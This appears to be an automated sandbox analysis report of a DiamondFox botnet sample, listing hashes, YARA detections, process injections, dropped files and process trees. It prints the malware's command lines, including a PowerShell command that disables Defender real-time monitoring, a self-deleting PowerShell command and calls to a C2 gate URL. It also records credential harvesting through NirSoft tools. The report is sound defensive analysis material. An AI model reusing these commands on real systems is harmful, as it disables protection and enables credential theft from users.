Analysis
- max time kernel: 131s
- max time network: 139s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 04-07-2021 00:03

Static task: static1
Behavioral task: behavioral1 (Sample: windef.exe, Resource: win7v20210410)
Behavioral task: behavioral2 (Sample: windef.exe, Resource: win10v20210408)

General
- Target: windef.exe
- Size: 203KB
- MD5: a1e165e1926c0c83123c89fce6b1af56
- SHA1: 281246ba4b852a5f62e032424f7816f5a6b0406f
- SHA256: 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
- SHA512: 28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 10 IoCs
Detects DiamondFox payload in file/memory.
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe | diamondfox
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe | diamondfox
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe | diamondfox
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe | diamondfox
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe | diamondfox
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe | diamondfox
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe | diamondfox
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe | diamondfox
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe | diamondfox
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe | diamondfox
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
Processes:
  resource | yara_rule
  behavioral2/memory/676-209-0x000000000044412E-mapping.dmp | MailPassView
  behavioral2/memory/676-211-0x0000000000400000-0x0000000000455000-memory.dmp | MailPassView
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
  resource | yara_rule
  behavioral2/memory/2284-196-0x00000000004466F4-mapping.dmp | WebBrowserPassView
  behavioral2/memory/2284-198-0x0000000000400000-0x000000000047C000-memory.dmp | WebBrowserPassView
-
Nirsoft 6 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/2284-196-0x00000000004466F4-mapping.dmp | Nirsoft
  behavioral2/memory/2284-198-0x0000000000400000-0x000000000047C000-memory.dmp | Nirsoft
  behavioral2/memory/2320-206-0x0000000000413E10-mapping.dmp | Nirsoft
  behavioral2/memory/2320-208-0x0000000000400000-0x0000000000422000-memory.dmp | Nirsoft
  behavioral2/memory/676-209-0x000000000044412E-mapping.dmp | Nirsoft
  behavioral2/memory/676-211-0x0000000000400000-0x0000000000455000-memory.dmp | Nirsoft
-
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
Processes:
  pid | process
  3128 | MicrosoftEdgeCPS.exe
  2284 | MicrosoftEdgeCPS.exe
  1184 | MicrosoftEdgeCPS.exe
  2320 | MicrosoftEdgeCPS.exe
  676 | MicrosoftEdgeCPS.exe
  3356 | MicrosoftEdgeCPS.exe
  1020 | MicrosoftEdgeCPS.exe
  3064 | MicrosoftEdgeCPS.exe
  3116 | MicrosoftEdgeCPS.exe
  2940 | localmgr.exe
-
Deletes itself 1 IoCs
Processes:
  pid | process
  412 | powershell.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 8 IoCs
Processes:
  description | pid | process | target process
  PID 3128 set thread context of 2284 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 set thread context of 1184 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 set thread context of 2320 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 set thread context of 676 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 set thread context of 3356 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 set thread context of 1020 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 set thread context of 3064 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 set thread context of 3116 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 4 IoCs
Processes:
  pid | process
  3216 | taskkill.exe
  4064 | taskkill.exe
  1552 | taskkill.exe
  2060 | taskkill.exe
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
  pid | process
  3652 | notepad.exe
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
  pid | process
  508 | powershell.exe
  412 | powershell.exe
  412 | powershell.exe
  508 | powershell.exe
  412 | powershell.exe
  508 | powershell.exe
  3128 | MicrosoftEdgeCPS.exe
  3128 | MicrosoftEdgeCPS.exe
  2284 | MicrosoftEdgeCPS.exe
  2284 | MicrosoftEdgeCPS.exe
  2284 | MicrosoftEdgeCPS.exe
  2284 | MicrosoftEdgeCPS.exe
  2320 | MicrosoftEdgeCPS.exe
  2320 | MicrosoftEdgeCPS.exe
  3128 | MicrosoftEdgeCPS.exe
  3128 | MicrosoftEdgeCPS.exe
  3128 | MicrosoftEdgeCPS.exe
  3128 | MicrosoftEdgeCPS.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description | pid | process
  Token: SeIncreaseQuotaPrivilege | 2284 | wmic.exe
  Token: SeSecurityPrivilege | 2284 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 2284 | wmic.exe
  Token: SeLoadDriverPrivilege | 2284 | wmic.exe
  Token: SeSystemProfilePrivilege | 2284 | wmic.exe
  Token: SeSystemtimePrivilege | 2284 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 2284 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 2284 | wmic.exe
  Token: SeCreatePagefilePrivilege | 2284 | wmic.exe
  Token: SeBackupPrivilege | 2284 | wmic.exe
  Token: SeRestorePrivilege | 2284 | wmic.exe
  Token: SeShutdownPrivilege | 2284 | wmic.exe
  Token: SeDebugPrivilege | 2284 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 2284 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 2284 | wmic.exe
  Token: SeUndockPrivilege | 2284 | wmic.exe
  Token: SeManageVolumePrivilege | 2284 | wmic.exe
  Token: 33 | 2284 | wmic.exe
  Token: 34 | 2284 | wmic.exe
  Token: 35 | 2284 | wmic.exe
  Token: 36 | 2284 | wmic.exe
  Token: SeIncreaseQuotaPrivilege | 2284 | wmic.exe
  Token: SeSecurityPrivilege | 2284 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 2284 | wmic.exe
  Token: SeLoadDriverPrivilege | 2284 | wmic.exe
  Token: SeSystemProfilePrivilege | 2284 | wmic.exe
  Token: SeSystemtimePrivilege | 2284 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 2284 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 2284 | wmic.exe
  Token: SeCreatePagefilePrivilege | 2284 | wmic.exe
  Token: SeBackupPrivilege | 2284 | wmic.exe
  Token: SeRestorePrivilege | 2284 | wmic.exe
  Token: SeShutdownPrivilege | 2284 | wmic.exe
  Token: SeDebugPrivilege | 2284 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 2284 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 2284 | wmic.exe
  Token: SeUndockPrivilege | 2284 | wmic.exe
  Token: SeManageVolumePrivilege | 2284 | wmic.exe
  Token: 33 | 2284 | wmic.exe
  Token: 34 | 2284 | wmic.exe
  Token: 35 | 2284 | wmic.exe
  Token: 36 | 2284 | wmic.exe
  Token: SeDebugPrivilege | 412 | powershell.exe
  Token: SeIncreaseQuotaPrivilege | 3836 | wmic.exe
  Token: SeSecurityPrivilege | 3836 | wmic.exe
  Token: SeTakeOwnershipPrivilege | 3836 | wmic.exe
  Token: SeLoadDriverPrivilege | 3836 | wmic.exe
  Token: SeSystemProfilePrivilege | 3836 | wmic.exe
  Token: SeSystemtimePrivilege | 3836 | wmic.exe
  Token: SeProfSingleProcessPrivilege | 3836 | wmic.exe
  Token: SeIncBasePriorityPrivilege | 3836 | wmic.exe
  Token: SeCreatePagefilePrivilege | 3836 | wmic.exe
  Token: SeBackupPrivilege | 3836 | wmic.exe
  Token: SeRestorePrivilege | 3836 | wmic.exe
  Token: SeShutdownPrivilege | 3836 | wmic.exe
  Token: SeDebugPrivilege | 3836 | wmic.exe
  Token: SeSystemEnvironmentPrivilege | 3836 | wmic.exe
  Token: SeRemoteShutdownPrivilege | 3836 | wmic.exe
  Token: SeUndockPrivilege | 3836 | wmic.exe
  Token: SeManageVolumePrivilege | 3836 | wmic.exe
  Token: 33 | 3836 | wmic.exe
  Token: 34 | 3836 | wmic.exe
  Token: 35 | 3836 | wmic.exe
  Token: 36 | 3836 | wmic.exe
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
  pid | process
  1184 | MicrosoftEdgeCPS.exe
  1020 | MicrosoftEdgeCPS.exe
  3064 | MicrosoftEdgeCPS.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description | pid | process | target process
  PID 804 wrote to memory of 3128 | 804 | windef.exe | MicrosoftEdgeCPS.exe
  PID 804 wrote to memory of 3128 | 804 | windef.exe | MicrosoftEdgeCPS.exe
  PID 804 wrote to memory of 3128 | 804 | windef.exe | MicrosoftEdgeCPS.exe
  PID 804 wrote to memory of 412 | 804 | windef.exe | powershell.exe
  PID 804 wrote to memory of 412 | 804 | windef.exe | powershell.exe
  PID 804 wrote to memory of 412 | 804 | windef.exe | powershell.exe
  PID 3128 wrote to memory of 508 | 3128 | MicrosoftEdgeCPS.exe | powershell.exe
  PID 3128 wrote to memory of 508 | 3128 | MicrosoftEdgeCPS.exe | powershell.exe
  PID 3128 wrote to memory of 508 | 3128 | MicrosoftEdgeCPS.exe | powershell.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 3836 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 3836 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 3836 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2880 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2880 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2880 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2288 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2288 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2288 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 3536 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 3536 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 3536 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 804 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 804 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 804 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2256 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2256 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2256 | 3128 | MicrosoftEdgeCPS.exe | wmic.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2284 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 1184 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 1184 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 1184 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 1184 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 1184 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 1184 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 1184 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 1184 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2320 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2320 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2320 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2320 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2320 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2320 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2320 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2320 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 2320 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 676 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 676 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 676 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 676 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 676 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 676 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 676 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
  PID 3128 wrote to memory of 676 | 3128 | MicrosoftEdgeCPS.exe | MicrosoftEdgeCPS.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\windef.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\windef.exe"
  - Suspicious use of WriteProcessMemory
-
  C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
      - Suspicious behavior: EnumeratesProcesses
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" os get caption /FORMAT:List
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" path win32_VideoController get caption /FORMAT:List
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
-
    C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (depth 3)
      Command line: /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
-
    C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (depth 3)
      Command line: /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
-
    C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (depth 3)
      Command line: /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
-
    C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (depth 3)
      Command line: /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
      - Executes dropped EXE
-
    C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (depth 3)
      Command line: X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
      - Executes dropped EXE
-
      C:\Windows\notepad.exe (depth 4)
        Command line: X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
        - Opens file in notepad (likely ransom note)
-
      C:\Windows\write.exe (depth 4)
        Command line: X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
-
    C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (depth 3)
      Command line: X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
-
    C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (depth 3)
      Command line: X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
-
    C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe (depth 3)
      Command line: X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
      - Executes dropped EXE
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
-
    C:\Windows\SysWOW64\taskkill.exe (depth 3)
      Command line: "taskkill" /PID 3356 /F
      - Kills process with taskkill
-
    C:\Windows\SysWOW64\taskkill.exe (depth 3)
      Command line: "taskkill" /PID 3064 /F
      - Kills process with taskkill
-
    C:\Windows\SysWOW64\taskkill.exe (depth 3)
      Command line: "taskkill" /PID 3116 /F
      - Kills process with taskkill
-
    C:\Windows\SysWOW64\taskkill.exe (depth 3)
      Command line: "taskkill" /PID 1020 /F
      - Kills process with taskkill
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
-
    C:\Windows\SysWOW64\Wbem\wmic.exe (depth 3)
      Command line: "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
-
    C:\Users\Admin\AppData\Local\Temp\localmgr.exe (depth 3)
      Command line: "C:\Users\Admin\AppData\Local\Temp\localmgr.exe"
      - Executes dropped EXE
-
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\windef.exe' -Force -Recurse
    - Deletes itself
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  MD5: db01a2c1c7e70b2b038edf8ad5ad9826
  SHA1: 540217c647a73bad8d8a79e3a0f3998b5abd199b
  SHA256: 413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
  SHA512: c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 775d05c534102b36882b4510f60680c5
  SHA1: 17fb67ef5233efcc2cbcfd54ce8bbe2176938793
  SHA256: 893ed03ced03806745236aef746b223ecbf295dfac6d9d78007876131f9c6d80
  SHA512: 98b328930f78cbad665001c75a9dc2e643554e02ab62dfd5531b5483e45851c1c73a6a4cf272ee65ac3c95ef43b491cd3fd062115fcf38591c3478c564e2f1d6
-
C:\Users\Admin\AppData\Local\Temp\1.log
  MD5: 4ab56e327e56a995c158a6116430835b
  SHA1: bf39dbae7798cc8bd7d7073998b09652412b111b
  SHA256: 269c32926bf6faebe0581c23903f8dc8cef41ad46b333435d038b81d47f4785e
  SHA512: 37704769bf293cd6a9c0ccbec359fbb7278f163911d3f2ae27f6c9c3dece55be70c2c5695be953def5984b7eda05953b19581df236c44d5d269cf258e49ab4af
-
C:\Users\Admin\AppData\Local\Temp\localmgr.exe
  MD5: f4f7f1f8b8f893bdd621f425646919a5
  SHA1: cc1ccc560723692407ce86972865a956faa62229
  SHA256: fd8ef0b8b997038aa6a4a416298965545e24f6367e364e58ebd6343515b73c8a
  SHA512: 7621478e0d0e3036682e76e7db3675d5053a4decff033d75c9608744245b91b970a937f3006f80c6262408f8072b06b74af606c88d4c9a951eda88320275fc03
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
  MD5: a1e165e1926c0c83123c89fce6b1af56
  SHA1: 281246ba4b852a5f62e032424f7816f5a6b0406f
  SHA256: 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
  SHA512: 28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\id.conf
  MD5: 6df6af7665efdfe5fdfabd83153001d7
  SHA1: 37a94a6a446082bba9c2ec0ecfc3b8960bf95085
  SHA256: 986686ce26c1c60d688174cddca881de7c6874bca4e5e6db2fd1dd5b29fc14ba
  SHA512: 0a97a8ca010550e8487b0586357b7e8dd6ce1d20fe2acbce7c9e0c5cba04760b9364995ac336a4fcfe9036e317972557bb38e7192defe32655d796eb6421fcb4
-
C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.conf
  MD5: 69bf7238c8e32793411515d8ca5926a9
  SHA1: d6918bcceab927a036b760a82cadd340d83b8ed1
  SHA256: 57df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66
  SHA512: 4a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3
-
Memory dumps
- memory/412-126-0x0000000007840000-0x0000000007841000-memory.dmp (Filesize 4KB)
- memory/412-140-0x0000000008130000-0x0000000008131000-memory.dmp (Filesize 4KB)
- memory/412-143-0x0000000008480000-0x0000000008481000-memory.dmp (Filesize 4KB)
- memory/412-137-0x0000000008050000-0x0000000008051000-memory.dmp (Filesize 4KB)
- memory/412-135-0x0000000007EE0000-0x0000000007EE1000-memory.dmp (Filesize 4KB)
- memory/412-133-0x00000000077F0000-0x00000000077F1000-memory.dmp (Filesize 4KB)
- memory/412-130-0x0000000007202000-0x0000000007203000-memory.dmp (Filesize 4KB)
- memory/412-157-0x0000000009DF0000-0x0000000009DF1000-memory.dmp (Filesize 4KB)
- memory/412-162-0x0000000009580000-0x0000000009581000-memory.dmp (Filesize 4KB)
- memory/412-202-0x0000000007203000-0x0000000007204000-memory.dmp (Filesize 4KB)
- memory/412-128-0x0000000007200000-0x0000000007201000-memory.dmp (Filesize 4KB)
- memory/412-124-0x00000000070F0000-0x00000000070F1000-memory.dmp (Filesize 4KB)
- memory/412-117-0x0000000000000000-mapping.dmp
- memory/508-145-0x0000000008000000-0x0000000008001000-memory.dmp (Filesize 4KB)
- memory/508-147-0x0000000007F40000-0x0000000007F41000-memory.dmp (Filesize 4KB)
- memory/508-180-0x0000000006873000-0x0000000006874000-memory.dmp (Filesize 4KB)
- memory/508-179-0x0000000009200000-0x0000000009201000-memory.dmp (Filesize 4KB)
- memory/508-178-0x0000000009040000-0x0000000009041000-memory.dmp (Filesize 4KB)
- memory/508-129-0x0000000006870000-0x0000000006871000-memory.dmp (Filesize 4KB)
- memory/508-131-0x0000000006872000-0x0000000006873000-memory.dmp (Filesize 4KB)
- memory/508-172-0x0000000008CC0000-0x0000000008CC1000-memory.dmp (Filesize 4KB)
- memory/508-166-0x000000007E840000-0x000000007E841000-memory.dmp (Filesize 4KB)
- memory/508-164-0x0000000008CE0000-0x0000000008D13000-memory.dmp (Filesize 204KB)
- memory/508-118-0x0000000000000000-mapping.dmp
- memory/676-209-0x000000000044412E-mapping.dmp
- memory/676-211-0x0000000000400000-0x0000000000455000-memory.dmp (Filesize 340KB)
- memory/804-154-0x0000000000000000-mapping.dmp
- memory/1020-217-0x0000000000400000-0x0000000000405000-memory.dmp (Filesize 20KB)
- memory/1020-214-0x00000000004010B8-mapping.dmp
- memory/1184-205-0x0000000000400000-0x0000000000405000-memory.dmp (Filesize 20KB)
- memory/1184-203-0x0000000000401074-mapping.dmp
- memory/1552-230-0x0000000000000000-mapping.dmp
- memory/1816-226-0x0000000000000000-mapping.dmp
- memory/2060-231-0x0000000000000000-mapping.dmp
- memory/2112-233-0x0000000000000000-mapping.dmp
- memory/2200-225-0x0000000000000000-mapping.dmp
- memory/2256-177-0x0000000000000000-mapping.dmp
- memory/2284-123-0x0000000000000000-mapping.dmp
- memory/2284-198-0x0000000000400000-0x000000000047C000-memory.dmp (Filesize 496KB)
- memory/2284-196-0x00000000004466F4-mapping.dmp
- memory/2288-142-0x0000000000000000-mapping.dmp
- memory/2320-208-0x0000000000400000-0x0000000000422000-memory.dmp (Filesize 136KB)
- memory/2320-206-0x0000000000413E10-mapping.dmp
- memory/2880-138-0x0000000000000000-mapping.dmp
- memory/2940-238-0x0000000004FD3000-0x0000000004FD5000-memory.dmp (Filesize 8KB)
- memory/2940-234-0x0000000000000000-mapping.dmp
- memory/2940-237-0x0000000004FD0000-0x0000000004FD1000-memory.dmp (Filesize 4KB)
